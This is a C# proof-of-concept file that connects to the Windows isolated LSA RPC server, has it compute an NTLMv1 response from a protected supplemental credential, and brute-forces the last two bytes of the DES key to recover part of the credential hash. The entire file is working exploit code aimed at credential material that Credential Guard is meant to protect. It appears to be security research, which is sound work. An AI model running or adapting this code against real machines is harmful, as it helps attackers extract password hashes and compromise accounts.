﻿using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtlmRpcIum;
using System;
using System.Linq;
using System.Runtime.InteropServices;

namespace poc
{
    internal class TestNtlm
    {
        [DllImport("advapi32.dll", EntryPoint = "SystemFunction002")]
        private static extern NtStatus RtlDecryptBlock(byte[] cipher_block, byte[] block_key, byte[] clear_block);

        public static void TestSuppCred(byte[] cred, byte[] real_key)
        {
            Client c = new Client();
            c.Connect("LSA_ISO_RPC_SERVER");
            c.NtlmIumGetContext(out NdrContextHandle handle).CheckResult();

            byte[] new_cred = new byte[cred.Length - 8];
            Buffer.BlockCopy(cred, 8, new_cred, 0, new_cred.Length);

            Struct_16 s16 = new Struct_16(new_cred.Length, new_cred.Length, new_cred);
            c.NtlmIumMakeOwfsFromIumSupplementalCredential(handle, s16, out MSV1_0_SECRETS_WRAPPER s).CheckResult();
            Console.WriteLine(s.Member0);

            byte[] challenge = new byte[] { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 };

            c.NtlmIumCalculateNtResponse(handle, new CRED_BLOCK(challenge), s, out Struct_8 s8).CheckResult();
            Console.WriteLine(s8.Member0.SelectMany(b => b.Member0).ToArray().ToHexDump());
            byte[] key = new byte[7];
            for (int i = 0; i < ushort.MaxValue; ++i)
            {
                key[0] = (byte)(i & 0xFF);
                key[1] = (byte)((i >> 8) & 0xFF);
                byte[] plain_text = new byte[8];
                bool found = true;
                RtlDecryptBlock(s8.Member0[2].Member0, key, plain_text).ToNtException();
                for (int j = 0; j < 8; ++j)
                {
                    if (plain_text[j] != challenge[j])
                    {
                        found = false;
                        break;
                    }
                }
                if (found)
                {
                    Console.WriteLine("Found last 2 bytes of key are      {0:X02} {1:X02}", key[0], key[1]);
                    Console.WriteLine("Expected last 2 bytes of key to be {0:X02} {1:X02}", real_key[14], real_key[15]);
                    return;
                }
            }
            throw new ArgumentException("Couldn't decrypt NTLMv1 challenge.");
        }
    }
}
